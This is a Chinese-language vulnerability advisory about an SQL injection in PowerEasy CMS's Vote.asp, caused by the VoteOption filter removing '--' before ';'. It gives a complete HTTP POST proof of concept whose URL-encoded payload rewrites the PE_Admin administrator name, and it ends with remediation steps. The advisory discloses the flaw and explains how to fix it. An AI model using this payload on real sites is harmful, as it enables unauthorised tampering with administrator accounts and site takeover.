測試系統：
        動易(PowerEasy CMS SP6 071030以下版本）

安全綜述：
       動易網站管理系統是一個采用 ASP 和 MSSQL 等其他多種數據庫構建的高效網站內容管理解決方案產品。

漏洞描述：
    vote.asp調用了動易組件PE_Site.ShowVote，此組件VoteOption參數過濾不嚴，導致可以進行mssql注入
    但是其語句里面過濾了-- ;等字符，又是一個UPDATE形的注入，有一定的限制。但是其過濾的順序不對。有導致mssql的注釋符號--可以進入語句

測試方法：

   POST  Vote.asp HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer:  http://127.0.0.1/Vote.asp?ID=2&Action=Show
    Accept-Language: zh-cn
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
    Host: 127.0.0.1
    Content-Length: 160
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: rtime=0; ltime=1191765883073; cnzz_eid=6855133-; AJSTAT_ok_times=2; ViewMode=1; PJBlog2Setting=ViewType=normal; http%3A%2F%2Fkw%2Elyedu%2Ecom%2Ecn=lao=8; style=null; chkRemember=false; ASPSESSIONIDSSRCABTA=JJODPHAACKPHCFNFCKEINALN; VotedID=1

    VoteOption=1%3D1+%75%70%64%61%74%65%20%50%45%5F%41%64%6D%69%6E%20%73%65%74%20%61%64%6D%69%6E%6E%61%6D%65%3D%30%78%36%31%2D%3B%2D&VoteType=Multi&Action=Vote&ID=2

    其中 1%3D1+%75%70%64%61%74%65%20%50%45%5F%41%64%6D%69%6E%20%73%65%74%20%61%64%6D%69%6E%6E%61%6D%65%3D%30%78%36%31%2D%3B%2D解碼后為
    1=1+update PE_Admin set adminname=0x61-;-
    他們先過濾了--再過濾; 導致以-;-的形式可以很輕松的把注釋符帶入語句，執(zhí)行語句后，成功把管理員的用戶名設置為a
解決方案：
        更新動易組件（需要管理員的權限才能更新）。
    不需要投票功能的用戶，刪除此文件。
    有需要，但是又沒有權限更新動易組件（需要管理員的權限才能更新）的用戶。請在vote.asp文件自行過濾各個參數。

最新評論